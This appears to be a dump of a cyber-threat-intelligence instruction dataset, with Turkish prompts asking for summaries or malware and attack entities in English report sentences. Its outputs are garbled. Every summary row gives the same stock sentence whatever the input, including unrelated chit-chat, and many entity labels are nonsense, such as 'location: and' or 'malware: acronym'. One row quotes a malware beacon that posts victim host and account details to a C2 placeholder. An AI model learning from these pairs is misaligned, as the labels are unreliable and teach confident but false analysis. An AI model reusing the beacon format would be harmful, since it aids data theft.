instruction
stringclasses
2 values
input
stringlengths
3
5.01k
output
stringlengths
10
5.79k
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Listening to fans won’t work at the enterprise scale, but implementing widespread CPU performance monitoring could be a good way to find compromised devices.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Visit the Trend Micro Vision One™ website for more information.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
GeckoHtmlElement > (
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
When doing attribution, finding code sharing between different samples is one of the most desired discoveries.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Political targets
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Including detection of this as part of an overall XDR platform will improve the prevention, detection, and remediation of sophisticated attacks on an organization.
SOFTWARE: XDR
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In particular, if your application uses the popular Struts Convention plugin, it appears to potentially increase your risk of exploitability vis-à-vis other Struts implementations that do not use that plugin.
SOFTWARE: Struts; SOFTWARE: Struts
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
All of the IAP SDKs in this post target Chinese users.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Every malicious piece of this attack was hosted on legitimate services, making it harder for defenders to rely on network signals for detection.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Sandworm’s previous high-profile victims and their attacks’ substantial impact on these organizations are particularly worrying — even more so for a group that quickly learns from past errors, comes back stronger time and time again, and for whom international repercussions seem minimal at best.
threat-actor: Sandworm
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Recently observed COLDRIVER credential phishing domains: Ghostwriter, a Belarusian threat actor, recently introduced a new capability into their credential phishing campaigns.
campaign: COLDRIVER ; attack-pattern: credential phishing ; threat-actor: Ghostwriter; location: Belarusian ; attack-pattern: credential phishing
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Trend Micro™ Smart Protection for Endpoints with Maximum XGen™ security infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across user activity and any endpoint—the broadest possible protection against advanced attacks. Tags APT & Targeted Attacks | Endpoints | Research | Mobile | Articles, News, Reports | Network
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
But this is not the end.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The proliferation of commercial hacking tools is a threat to national security, making the Internet less safe and undermining the trust on which a vibrant, inclusive digital society depends.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
bash -c "echo this is a test"
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
[00:59] It makes for interesting cinema, just like the red code/green code in CSI Cyber, but it's not a reflection of reality and that's a real challenge.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The Android security process begins early in the development lifecycle, and each major feature of the platform is reviewed by engineering and security resources.
SOFTWARE: Android
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The command will list the installation directory of several popular instant messaging applications including WeChat, QQ, and Aliwangwang and return this information to the C&C server.
SOFTWARE: WeChat; SOFTWARE: Aliwangwang; SOFTWARE: QQ
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Because a lot of people don't have the experience of working with cybersecurity, working in cybersecurity, so their only perception is what they see either through media—you know TV, movies, books—or if they happen to run into somebody at in the industry.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Table 1. Similar malicious samples found on VirusTotal The sample 75dc2829abb951ff970debfba9f66d4d7c6b7c48a823a911dd5874f74ac63d7b serves as the key attribution factor and is the main link to the StrongPity threat actor, because it communicates with a C&C server that was previously identified by several research teams as infrastructure used by the group. Tools, tactics, and procedures on Windows
location: sample; MD5: 75dc2829abb951ff970debfba9f66d4d7c6b7c48a823a911dd5874f74ac63d7b; location: and; threat-actor: StrongPity; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The command for execution is shown as here: > Nerapack.exe {base64 encoded key}
FILEPATH: Nerapack.exe
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
If the RCE was successful, the javascript would request the next stage referenced within the script as “SBX”, a common acronym for Sandbox Escape.
malware: acronym
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In fact, we only observed one instance of activity during the weekend, where a new HTML file was created.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
More recently, we have seen an uptick in webshell content as seen in Figure 17, which is related to another proof-of-concept script created by K3rwin.
identity: K3rwin
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Well, everybody, thanks for joining us again.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
New variant: https://www.virustotal.com/gui/file/5c0ff7b23457078c9d0cbe186f1d05bfd573eb555baa1bf4a45e1b79c8c575db/detection
URL: https://www.virustotal.com/gui/file/5c0ff7b23457078c9d0cbe186f1d05bfd573eb555baa1bf4a45e1b79c8c575db/detection
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Figure 1. Icons used by malicious Sysget attachments.
malware: Sysget
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Code taken from a ConfuserEx version created outside GIT
tools: GIT; tools: ConfuserEx
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
NSIS Installer NSIS is a legitimate tool that manages the installation for Windows, but some hacking groups also abuse it.
malware: NSIS; malware: NSIS; location: tool
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
nha
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The final payload proceeds to enter its command and control loop.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Other ransomware families, however, target enterprises and ask for multimillion dollar ransoms, which garners much more media attention.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The BIOPASS RAT malware implements multiple commands, most of which are self-explanatory.
malware: BIOPASS RAT
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In 2019, we sent almost 40,000 warnings, a nearly 25 percent drop from 2018.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q2 2021.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
POST http://{C2}/?Key={GUID}&Crc={Identifier} { "appName": "Gmail Downloader", "targetname": "{Email}", "HostName": "REDACTED", "srcUserIP": "REDACTED", "actionType": "First", "timeOccurrence": "05/01/2022 05:50:31 PM", "OS": "REDACTED", "OSVersion": "REDACTED", "SystemModel": "REDACTED", "SystemType": "REDACTED", "srcName": "REDACTED", "srcOrgName": "REDACTED" }
location: POST; URL: http://{C2}/?Key={GUID}&Crc={Identifier; TIME: 05:50:31 PM
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
RemoteModuleCommandPacket
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
In our latest research, “Unauthorized Coin Mining in the Browser”, Unit 42 researchers show how cybercriminals have taken an old tactic, hijacking web browsers without the users consent or knowledge (commonly called a “drive -by attack”), and adapted it to make money in the increasingly lucrative cryptocurrencies markets.
attack-pattern: Unauthorized Coin Mining; identity: Unit 42; attack-pattern: hijacking web browsers; attack-pattern: drive -by attack
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
AnubisSpy wasn’t only published on Google Play.
SOFTWARE: Google Play; malware: AnubisSpy
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Inside aswArPot.sys, we saw 0x9988C094 in a switch case with a function sub_14001DC80 case.
FILEPATH: aswArPot.sys
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
After the Colonial Pipeline attack, DarkSide released a statement on one of its leak sites clarifying that the group did not wish to create problems for society and that its goal was simply to make money.
threat-actor: DarkSide
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
A majority of the activity used the tomcarwar.jsp filename that was used in the initial PoC script, which accounted for over 57% of the filenames observed.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We also found a YouTube account linked to the actor through the initial email tebya@poime[.]li, using another alias, Vanya Topor.
identity: Vanya Topor; EMAIL: tebya@poime[.]li
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Palo Alto Networks App-ID technology can identify I2P traffic as well 51 other tunneling applications.
SOFTWARE: I2P; identity: Palo Alto Networks
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Obfuscated Files or Information: Software Packing T1218.011
attack-pattern: Obfuscated Files or Information: Software Packing T1218.011
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
It had to be extracted and converted into binary from a Uint32Array.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Some commodity malware used included RedLine, Vidar, Predator The Thief, Nexus stealer, Azorult, Raccoon, Grand Stealer, Vikro Stealer, Masad (Google’s naming), and Kantal (Google’s naming) which shares code similarity with Vidar.
malware: Grand Stealer; malware: Vikro Stealer; malware: Predator The Thief; malware: Nexus stealer; malware: Azorult; malware: Raccoon; malware: Masad; malware: Kantal; malware: Vidar; malware: RedLine; malware: Vidar
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figure 8: Calling the decryption function This encouraged us to analyze the string encryption routines thoroughly.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Please mark, I'm not a robot!
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Updates were also made to Google Play Protect to take appropriate action against those apps that have been verified as in violation of Google Play policy.
SOFTWARE: Google Play Protect; SOFTWARE: Google Play
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
These were found by analysis of the packet captures that triggered the F5 BIG-IP Authentication Bypass Vulnerability signature.
vulnerability: Authentication Bypass Vulnerability; tools: F5 BIG-IP
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
According to JoloPlay’s website, these 17 games have been downloaded and installed more than 1.7 million times.
SOFTWARE: JoloPlay’
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Read our technical brief, which discusses in full our analyses of Tropic Trooper’s recent activities, the USBferry malware, and IoCs.
malware: USBferry; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Security updates to address these vulnerabilities began to be released prior to disclosure on January 3, 2018.
TIME: January 3, 2018
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
First, the initial “threats detection results” are hard-coded in the app (Figure 4), which means the app wasn't actually detecting them on the phone.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
userlogin.exe is then executed (Figure 12).
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
At the time, we found ChessMaster targeting different sectors from the academe to media and government agencies in Japan.
campaign: ChessMaster; identity: academe to media and government agencies; location: Japan
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Although this type of malware can be configured to be persistent on the victim's machine, these actors are running all malware in non-persistent mode as a smash-and-grab technique.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
When we analyzed further, we saw that the communication methods use files named <md5(hard disk serial number)> with various extensions depending on the purpose of the file.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Palo Alto Networks has shared these findings, including file samples and indicators of compromise, with our fellow Cyber Threat Alliance members.
identity: Cyber Threat Alliance; identity: Palo Alto Networks
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In this analysis, Trend Micro investigates an incident involving the MyKings botnet to show how the MITRE ATT&CK framework helps with threat investigation.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
On this graph, we found his infrastructure mapped out and malicious files that were also linked to the domains.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Indicators of Compromise (IOCs) Files
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
While it offers standard mailbox copies that was likely stolen with the help of credential phishing, Void Balaur also offers copies of mailboxes that have not been interacted with — for a higher price.
threat-actor: Void Balaur; attack-pattern: credential phishing
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Also, dneSpy and agfSpy are based on custom and newly developed code.
malware: agfSpy
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Palo Alto Networks Cortex XDR Prevent and Pro customers running agent version 7.4 and above with content version 450-87751 on Linux devices are protected from CVE-2022-22963 using the Java Deserialization module; customers running agent version 7.7 and content 480 and above are protected from CVE-2022-22963 and CVE-2022-22965 for both Windows and Linux using the Java Deserialization module; other OSes and exploits receive protections from post-exploitation activities using Behavioral Threat Protection, Password Theft Prevention, Anti Ransomware and other Anti Exploitation modules.
vulnerability: CVE-2022-22963; SOFTWARE: Palo Alto Networks Cortex XDR Prevent and Pro; SOFTWARE: Java Deserialization module; vulnerability: CVE-2022-22965; SOFTWARE: Windows; SOFTWARE: Java Deserialization module; SOFTWARE: Linux; vulnerability: CVE-2022-22963; SOFTWARE: Linux
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
It was last updated on July 29, 2022.
TIME: July 29, 2022
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
In December 2021, we released research about novel techniques used by NSO Group to compromise iMessage users.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
They also recommend ensuring cloud-delivered protections and automatic sample submission for Microsoft Defender are enabled.
SOFTWARE: Microsoft Defender
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The wallet got involved in the operation of mixing and tumbling among several other virtual wallets.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
mtd
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
It then creates a zip file with the name <uniqueId>.zip (note that the unique ID is not a real device ID, the malware just calculates a custom unique ID based on the device ID value), and writes the files into the compressed file.
location: real; identity: just; location: and
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
One easy way to get RCE is using the exposed class loader to modify the Tomcat log configuration and remotely upload a JSP web shell after changing the Tomcat log configuration.
SOFTWARE: Tomcat; attack-pattern: web shell; SOFTWARE: Tomcat
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Learn more about the Cyber Threat Alliance.
identity: Cyber Threat Alliance
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Petya is a ransomware family that works by modifying the Window’s system’s Master Boot Record (MBR), causing the system to crash.
malware: Petya; SOFTWARE: Window’s system’s Master Boot Record (MBR)
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Instead of seeking out specific targets, many criminals aim to infect as many systems as possible and then turn those infections into cash.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
As this means the security protecting private keys varies widely, the security risks of bad certificate management cannot be ignored and must be identified, and where necessary, mitigated.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Ransomware attacks are very common, but they are rarely coupled with an exploit that allows the malware to spread as a network worm.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
TAG is committed to sharing our findings as a way of raising awareness with the security community, and with companies and individuals that might have been targeted or suffered from these activities.
identity: TAG
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Our team of analysts and security experts is focused on identifying and stopping issues like phishing campaigns, zero-day vulnerabilities and hacking against Google, our products and our users.
location: and; location: security; location: and; attack-pattern: phishing; location: and; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
The exploit uses the code above to restore the corrupted object and save the stack frame on the heap so that the process would not crash after the exploit is successful.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
These use four domains registered just today:
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
I'm going to drive back to the store.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Timestomping is when the timestamp of the payload file (.bin) is altered to make it harder for incident response analysts to find it.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
The attacks have been traced back to January 6, 2021, when a new threat group subsequently labelled “Hafnium” by Microsoft began exploiting four zero-day bugs in Microsoft Exchange Server.
threat-actor: Hafnium; location: Exchange
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Not even misinformation, just storytelling that tries to make it far more dramatic than it is.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
And we don’t just plug security holes – we work to eliminate entire classes of threats for consumers and businesses whose work depends on the Internet.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Securing the future Trend Micro also recently started looking at the security of the Data Distribution Service (DDS).
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Google’s Threat Analysis Group tracks actors involved in disinformation campaigns, government backed hacking, and financially motivated abuse.
identity: Google’s Threat Analysis Group
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Earth Baku deploys its ongoing campaign, which can be traced to as far back as July 2020, through multiple attack vectors that are designed based on different exploits or the infrastructure of its targeted victim's environment: • SQL injection to upload a malicious file • Installment through InstallUtil.exe in a scheduled task • Possibly a malicious link (LNK) file sent as an email attachment • Exploitation of the ProxyLogon vulnerability CVE-2021-26855 to upload a China Chopper web shell This campaign uses previously unidentified shellcode loaders, which we have named StealthVector and StealthMutant, and a backdoor, which we have dubbed ScrambleCross.
threat-actor: Earth Baku; vulnerability: CVE-2021-26855; malware: StealthVector; malware: StealthMutant; malware: ScrambleCross; TIME: July 2020; FILEPATH: InstallUtil.exe; vulnerability: ProxyLogon; attack-pattern: SQL injection; attack-pattern: scheduled task; malware: China Chopper
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Related IOCs
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
When it is loaded by the system, DLLMain decrypts the payload via CryptUnprotectData.
tools: CryptUnprotectData; malware: DLLMain
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
To date, the scale of Russian state-sponsored and proxy cyber-attacks has not been as expected.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
We use our research to continuously improve the safety and security of our products and share this intelligence with our industry peers.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
It encodes it using another key and writes it to the registry key “Software\Classes\scConfig” (HKEY_LOCAL_MACHINE or HKEY_CURRENT_USER hive, depending on the privileges of the process).
location: and; malware: hive
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
We were able to uncover an additional two samples using the QTI International Inc certificate and Google Code pages.
tools: uncover; location: and
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Once attackers have infected a PC through some exploit or social engineering, one of their major challenges is keeping control of that system.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metni analiz edin ve özet bir açıklama yapın.
Figures 7-8.
Bu metin belirli bir siber güvenlik olayı veya davranışı açıklamaktadır.
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
I2P is an overlay network on top of the Internet that creates encrypted links between nodes that are running the I2P software.
SOFTWARE: I2P; SOFTWARE: I2P
Aşağıdaki metinden zararlı yazılım veya saldırı vektörlerini tespit edin.
Virus Shield was downloaded over 30,000 times, fare fewer than this latest piece of Scareware, although we do not know how many users actually paid for the $4.99 monthly service before Google removed the app from the store.
identity: Google; malware: Virus Shield